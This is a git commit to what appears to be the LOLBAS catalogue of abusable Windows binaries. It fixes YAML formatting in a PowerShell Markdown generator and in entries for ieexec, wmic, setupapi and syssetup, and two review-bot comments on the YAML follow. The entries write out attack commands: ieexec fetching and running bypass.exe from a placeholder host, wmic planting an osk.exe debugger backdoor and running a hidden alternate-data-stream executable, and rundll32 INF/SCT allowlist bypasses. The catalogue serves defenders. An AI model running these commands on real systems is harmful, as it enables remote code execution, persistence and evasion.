Minor adjustments to be yaml compliant
This commit is contained in:
parent
37cc1ee83e
commit
f8fec9849b
@ -29,16 +29,16 @@ function Convert-YamlToMD
|
|||||||
"name: $($YamlObject.Name)"| Add-Content $Outfile
|
"name: $($YamlObject.Name)"| Add-Content $Outfile
|
||||||
"description: $($YamlObject.Description)"| Add-Content $Outfile
|
"description: $($YamlObject.Description)"| Add-Content $Outfile
|
||||||
"function:"| Add-Content $Outfile
|
"function:"| Add-Content $Outfile
|
||||||
# Need a category linked to the different things... Execute, Download, AWL-bypass.
|
|
||||||
|
|
||||||
foreach($cmd in $YamlObject.Commands)
|
foreach($cmd in $YamlObject.Commands)
|
||||||
{
|
{
|
||||||
" $($cmd.Category):"| Add-Content $Outfile
|
" $($cmd.Category):"| Add-Content $Outfile
|
||||||
" - description: $($cmd.Description)"| Add-Content $Outfile
|
" - description: $($cmd.Description)"| Add-Content $Outfile
|
||||||
" code: $($cmd.Command)"| Add-Content $Outfile
|
" code: $($cmd.Command)"| Add-Content $Outfile
|
||||||
" code: $($cmd.Command)"| Add-Content $Outfile
|
|
||||||
" mitreid: $($cmd.MitreID)"| Add-Content $Outfile
|
" mitreid: $($cmd.MitreID)"| Add-Content $Outfile
|
||||||
" mitrelink: $($cmd.MitreLink)"| Add-Content $Outfile
|
" mitrelink: $($cmd.MitreLink)"| Add-Content $Outfile
|
||||||
|
" operatingsystem: $($cmd.Operatingsystem)"| Add-Content $Outfile
|
||||||
|
" privileges: $($cmd.Privileges)"| Add-Content $Outfile
|
||||||
}
|
}
|
||||||
"resources:"| Add-Content $Outfile
|
"resources:"| Add-Content $Outfile
|
||||||
foreach($link in $YamlObject.Resources)
|
foreach($link in $YamlObject.Resources)
|
||||||
@ -48,9 +48,14 @@ function Convert-YamlToMD
|
|||||||
"fullpath:"| Add-Content $Outfile
|
"fullpath:"| Add-Content $Outfile
|
||||||
foreach($path in $YamlObject.'Full path')
|
foreach($path in $YamlObject.'Full path')
|
||||||
{
|
{
|
||||||
" - path: $($path)"| Add-Content $Outfile
|
" - Path: $($path)"| Add-Content $Outfile
|
||||||
|
}
|
||||||
|
"acknowledgement:"| Add-Content $Outfile
|
||||||
|
foreach($pers in $YamlObject.Acknowledgement)
|
||||||
|
{
|
||||||
|
" - Person: $($pers.Person)"| Add-Content $Outfile
|
||||||
|
" Handle: `'$($pers.Handle)`'"| Add-Content $Outfile
|
||||||
}
|
}
|
||||||
"notes: $($YamlObject.Notes)"| Add-Content $Outfile
|
|
||||||
"---" | Add-Content $Outfile
|
"---" | Add-Content $Outfile
|
||||||
}
|
}
|
||||||
End
|
End
|
||||||
@ -112,11 +117,11 @@ function Invoke-GenerateMD
|
|||||||
|
|
||||||
#Generate the stuff!
|
#Generate the stuff!
|
||||||
#Bins
|
#Bins
|
||||||
#Invoke-GenerateMD -YmlPath "$mainpath\yml\OSBinaries" -Outpath "c:\tamp\Binaries" -Verbose
|
##Invoke-GenerateMD -YmlPath "$mainpath\yml\OSBinaries" -Outpath "c:\tamp\Binaries" -Verbose
|
||||||
Invoke-GenerateMD -YmlPath "$mainpath\yml\OtherMSBinaries" -Outpath "c:\tamp\OtherMSBinaries" -Verbose
|
Invoke-GenerateMD -YmlPath "$mainpath\yml\OtherMSBinaries" -Outpath "c:\tamp\OtherMSBinaries" -Verbose
|
||||||
|
|
||||||
##Scripts
|
##Scripts
|
||||||
#Invoke-GenerateMD -YmlPath "$mainpath\yml\OSScripts" -Outpath "c:\tamp\SCripts" -Verbose
|
##Invoke-GenerateMD -YmlPath "$mainpath\yml\OSScripts" -Outpath "c:\tamp\Scripts" -Verbose
|
||||||
|
|
||||||
##Libs
|
##Libs
|
||||||
#Invoke-GenerateMD -YmlPath "$mainpath\yml\OSLibraries" -Outpath "c:\tamp\Libraries" -Verbose
|
##Invoke-GenerateMD -YmlPath "$mainpath\yml\OSLibraries" -Outpath "c:\tamp\Libraries" -Verbose
|
@ -24,7 +24,7 @@ Full Path:
|
|||||||
- Path: C:\Windows\System32\bash.exe
|
- Path: C:\Windows\System32\bash.exe
|
||||||
- Path: C:\Windows\SysWOW64\bash.exe
|
- Path: C:\Windows\SysWOW64\bash.exe
|
||||||
Code Sample:
|
Code Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Child process from bash.exe
|
- IOC: Child process from bash.exe
|
||||||
Resources:
|
Resources:
|
||||||
|
@ -40,7 +40,7 @@ Full Path:
|
|||||||
- Path: C:\Windows\System32\bitsadmin.exe
|
- Path: C:\Windows\System32\bitsadmin.exe
|
||||||
- Path: C:\Windows\SysWOW64\bitsadmin.exe
|
- Path: C:\Windows\SysWOW64\bitsadmin.exe
|
||||||
Code Sample:
|
Code Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Child process from bitsadmin.exe
|
- IOC: Child process from bitsadmin.exe
|
||||||
- IOC: bitsadmin creates new files
|
- IOC: bitsadmin creates new files
|
||||||
|
@ -40,7 +40,7 @@ Full Path:
|
|||||||
- Path: C:\Windows\System32\certutil.exe
|
- Path: C:\Windows\System32\certutil.exe
|
||||||
- Path: C:\Windows\SysWOW64\certutil.exe
|
- Path: C:\Windows\SysWOW64\certutil.exe
|
||||||
Code Sample:
|
Code Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Certutil.exe creating new files on disk
|
- IOC: Certutil.exe creating new files on disk
|
||||||
- IOC: Useragent Microsoft-CryptoAPI/10.0
|
- IOC: Useragent Microsoft-CryptoAPI/10.0
|
||||||
|
@ -4,7 +4,7 @@ Description: The IEExec.exe application is an undocumented Microsoft .NET Framew
|
|||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: '2018-05-25'
|
||||||
Commands:
|
Commands:
|
||||||
- Command:ieexec.exe http://x.x.x.x:8080/bypass.exe
|
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
|
||||||
Description: Downloads and executes bypass.exe from the remote server.
|
Description: Downloads and executes bypass.exe from the remote server.
|
||||||
Usecase: Download and run attacker code from remote location
|
Usecase: Download and run attacker code from remote location
|
||||||
Category: Download
|
Category: Download
|
||||||
@ -12,7 +12,7 @@ Commands:
|
|||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command:ieexec.exe http://x.x.x.x:8080/bypass.exe
|
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
|
||||||
Description: Downloads and executes bypass.exe from the remote server.
|
Description: Downloads and executes bypass.exe from the remote server.
|
||||||
Usecase: Download and run attacker code from remote location
|
Usecase: Download and run attacker code from remote location
|
||||||
Category: Execute
|
Category: Execute
|
||||||
@ -24,7 +24,7 @@ Full Path:
|
|||||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe
|
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe
|
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe
|
||||||
Code Sample:
|
Code Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
Resources:
|
Resources:
|
||||||
|
@ -40,7 +40,7 @@ Full Path:
|
|||||||
- Path: C:\Windows\System32\msiexec.exe
|
- Path: C:\Windows\System32\msiexec.exe
|
||||||
- Path: C:\Windows\SysWOW64\msiexec.exe
|
- Path: C:\Windows\SysWOW64\msiexec.exe
|
||||||
Code Sample:
|
Code Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: msiexec.exe getting files from Internet
|
- IOC: msiexec.exe getting files from Internet
|
||||||
Resources:
|
Resources:
|
||||||
@ -50,5 +50,5 @@ Acknowledgement:
|
|||||||
- Person: netbiosX
|
- Person: netbiosX
|
||||||
Handle: '@netbiosX'
|
Handle: '@netbiosX'
|
||||||
- Person: Philip Tsukerman
|
- Person: Philip Tsukerman
|
||||||
Handle: @PhilipTsukerman
|
Handle: '@PhilipTsukerman'
|
||||||
---
|
---
|
@ -31,7 +31,7 @@ Commands:
|
|||||||
Full Path:
|
Full Path:
|
||||||
- Path: C:\Windows\System32\pcalua.exe
|
- Path: C:\Windows\System32\pcalua.exe
|
||||||
Code Sample:
|
Code Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
Resources:
|
Resources:
|
||||||
@ -40,5 +40,5 @@ Acknowledgement:
|
|||||||
- Person: Kyle Hanslovan
|
- Person: Kyle Hanslovan
|
||||||
Handle: '@kylehanslovan'
|
Handle: '@kylehanslovan'
|
||||||
- Person: Fab
|
- Person: Fab
|
||||||
Handle: @0rbz_
|
Handle: '@0rbz_'
|
||||||
---
|
---
|
@ -1,4 +1,4 @@
|
|||||||
---
|
---
|
||||||
Name: Wab.exe
|
Name: Wab.exe
|
||||||
Description: Windows address book manager
|
Description: Windows address book manager
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
@ -16,7 +16,7 @@ Full Path:
|
|||||||
- Path: C:\Program Files\Windows Mail\wab.exe
|
- Path: C:\Program Files\Windows Mail\wab.exe
|
||||||
- Path: C:\Program Files (x86)\Windows Mail\wab.exe
|
- Path: C:\Program Files (x86)\Windows Mail\wab.exe
|
||||||
Code Sample:
|
Code Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: WAB.exe should normally never be used
|
- IOC: WAB.exe should normally never be used
|
||||||
Resources:
|
Resources:
|
||||||
|
@ -5,7 +5,7 @@ Author: 'Oddvar Moe'
|
|||||||
Created: '2018-05-25'
|
Created: '2018-05-25'
|
||||||
Commands:
|
Commands:
|
||||||
- Command: wmic.exe process call create "c:\ads\file.txt:program.exe"
|
- Command: wmic.exe process call create "c:\ads\file.txt:program.exe"
|
||||||
Description: Execute a .EXE file stored as an Alternate Data Stream (ADS).
|
Description: Execute a .EXE file stored as an Alternate Data Stream (ADS)
|
||||||
Usecase: Execute binary file hidden in Alternate data streams to evade defensive counter measures
|
Usecase: Execute binary file hidden in Alternate data streams to evade defensive counter measures
|
||||||
Category: Alternate data streams
|
Category: Alternate data streams
|
||||||
Privileges: User
|
Privileges: User
|
||||||
@ -20,7 +20,7 @@ Commands:
|
|||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: wmic.exe /user: /password: /node: process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
|
- Command: 'wmic.exe /user: /password: /node: process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"'
|
||||||
Description: Add cmd.exe as a debugger for the osk.exe process. Each time osk.exe is run, cmd.exe will be run as well.
|
Description: Add cmd.exe as a debugger for the osk.exe process. Each time osk.exe is run, cmd.exe will be run as well.
|
||||||
Usecase: Execute binary by manipulate the debugger for a program to evade defensive counter measures
|
Usecase: Execute binary by manipulate the debugger for a program to evade defensive counter measures
|
||||||
Category: Execute
|
Category: Execute
|
||||||
@ -72,7 +72,7 @@ Full Path:
|
|||||||
- Path: C:\Windows\System32\wmic.exe
|
- Path: C:\Windows\System32\wmic.exe
|
||||||
- Path: C:\Windows\SysWOW64\wmic.exe
|
- Path: C:\Windows\SysWOW64\wmic.exe
|
||||||
Code Sample:
|
Code Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Wmic getting scripts from remote system
|
- IOC: Wmic getting scripts from remote system
|
||||||
Resources:
|
Resources:
|
||||||
|
@ -49,7 +49,7 @@ Code Sample:
|
|||||||
- Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Advpack.inf
|
- Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Advpack.inf
|
||||||
- Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Advpack_calc.sct
|
- Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Advpack_calc.sct
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: ''
|
- IOC:
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/
|
- Link: https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/
|
||||||
- Link: https://twitter.com/ItsReallyNick/status/967859147977850880
|
- Link: https://twitter.com/ItsReallyNick/status/967859147977850880
|
||||||
@ -63,5 +63,5 @@ Acknowledgment:
|
|||||||
- Person: Moriarty (RegisterOCX - CMD)
|
- Person: Moriarty (RegisterOCX - CMD)
|
||||||
Handle: '@moriarty_meng'
|
Handle: '@moriarty_meng'
|
||||||
- Person: Nick Carr (Threat Intel)
|
- Person: Nick Carr (Threat Intel)
|
||||||
Handle: @ItsReallyNick
|
Handle: '@ItsReallyNick'
|
||||||
---
|
---
|
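Review bot: Replacing `- IOC: ''` with a bare `- IOC:` (the `@ -49,7 +49,7 @@` hunk) changes the value from an empty string to YAML null, so a consumer that expects a string for each IOC — the generator's string interpolation, for instance — now receives nothing rather than `''`. If the intent is an empty placeholder, keep `- IOC: ''`; if no IOC is known, dropping the list item is clearer than a null entry. The same substitution appears in the setupapi.dll and syssetup.dll sections further down.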
@ -10,7 +10,7 @@ Commands:
|
|||||||
Category: AWL Bypass
|
Category: AWL Bypass
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1085
|
MitreID: T1085
|
||||||
MItreLink: https://attack.mitre.org/wiki/Technique/T1085
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
|
||||||
OperatingSystem: Windows
|
OperatingSystem: Windows
|
||||||
- Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\calc_exe.inf
|
- Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\calc_exe.inf
|
||||||
Description: Launch an executable file via the InstallHinfSection function and .inf file section directive.
|
Description: Launch an executable file via the InstallHinfSection function and .inf file section directive.
|
||||||
@ -18,7 +18,7 @@ Commands:
|
|||||||
Category: Execution
|
Category: Execution
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1085
|
MitreID: T1085
|
||||||
MItreLink: https://attack.mitre.org/wiki/Technique/T1085
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
|
||||||
OperatingSystem: Windows
|
OperatingSystem: Windows
|
||||||
Full Path:
|
Full Path:
|
||||||
- Path: c:\windows\system32\setupapi.dll
|
- Path: c:\windows\system32\setupapi.dll
|
||||||
@ -29,7 +29,7 @@ Code Sample:
|
|||||||
- Code: https://gist.githubusercontent.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba/raw/6cb52b88bcc929f5555cd302d9ed848b7e407052/Backdoor-Minimalist.sct
|
- Code: https://gist.githubusercontent.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba/raw/6cb52b88bcc929f5555cd302d9ed848b7e407052/Backdoor-Minimalist.sct
|
||||||
- Code: https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf
|
- Code: https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: ''
|
- IOC:
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://github.com/huntresslabs/evading-autoruns
|
- Link: https://github.com/huntresslabs/evading-autoruns
|
||||||
- Link: https://twitter.com/pabraeken/status/994742106852941825
|
- Link: https://twitter.com/pabraeken/status/994742106852941825
|
||||||
@ -42,5 +42,5 @@ Acknowledgment:
|
|||||||
- Person: Casey Smith (COM Scriptlet)
|
- Person: Casey Smith (COM Scriptlet)
|
||||||
Handle: '@subTee'
|
Handle: '@subTee'
|
||||||
- Person: Nick Carr (Threat Intel)
|
- Person: Nick Carr (Threat Intel)
|
||||||
Handle: @ItsReallyNick
|
Handle: '@ItsReallyNick'
|
||||||
---
|
---
|
@ -6,11 +6,11 @@ Created: '2018-05-25'
|
|||||||
Commands:
|
Commands:
|
||||||
- Command: rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\test\shady.inf
|
- Command: rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\test\shady.inf
|
||||||
Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).
|
Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).
|
||||||
UseCase: Run local or remote script(let) code through INF file specification (Note: May pop an error window).
|
UseCase: Run local or remote script(let) code through INF file specification (Note May pop an error window).
|
||||||
Category: AWL Bypass
|
Category: AWL Bypass
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1085
|
MitreID: T1085
|
||||||
MItreLink: https://attack.mitre.org/wiki/Technique/T1085
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
|
||||||
OperatingSystem: Windows
|
OperatingSystem: Windows
|
||||||
- Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf
|
- Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf
|
||||||
Description: Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive.
|
Description: Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive.
|
||||||
@ -18,7 +18,7 @@ Commands:
|
|||||||
Category: Execution
|
Category: Execution
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1085
|
MitreID: T1085
|
||||||
MItreLink: https://attack.mitre.org/wiki/Technique/T1085
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
|
||||||
OperatingSystem: Windows
|
OperatingSystem: Windows
|
||||||
Full Path:
|
Full Path:
|
||||||
- Path: c:\windows\system32\syssetup.dll
|
- Path: c:\windows\system32\syssetup.dll
|
||||||
@ -28,7 +28,7 @@ Code Sample:
|
|||||||
- Code: https://gist.github.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba#file-backdoor-minimalist-sct
|
- Code: https://gist.github.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba#file-backdoor-minimalist-sct
|
||||||
- Code: https://gist.github.com/homjxi0e/87b29da0d4f504cb675bb1140a931415
|
- Code: https://gist.github.com/homjxi0e/87b29da0d4f504cb675bb1140a931415
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: ''
|
- IOC:
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/pabraeken/status/994392481927258113
|
- Link: https://twitter.com/pabraeken/status/994392481927258113
|
||||||
- Link: https://twitter.com/harr0ey/status/975350238184697857
|
- Link: https://twitter.com/harr0ey/status/975350238184697857
|
||||||
|
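Review bot: The line `UseCase: Run local or remote script(let) code through INF file specification (Note May pop an error window).` in the `@ -6,11 +6,11 @@` hunk removes the colon after `Note` to dodge the YAML mapping-indicator error, but that alters the author's text; quoting the scalar keeps the wording and is still valid, `UseCase: 'Run local or remote script(let) code through INF file specification (Note: May pop an error window).'`. The key is also spelled `UseCase` here while the ieexec and wmic entries in this commit use `Usecase`, so a case-sensitive reader of the field will miss one of them. Consistency with the rest of the data set seems to be the point of this commit, so aligning the key name is worth folding in.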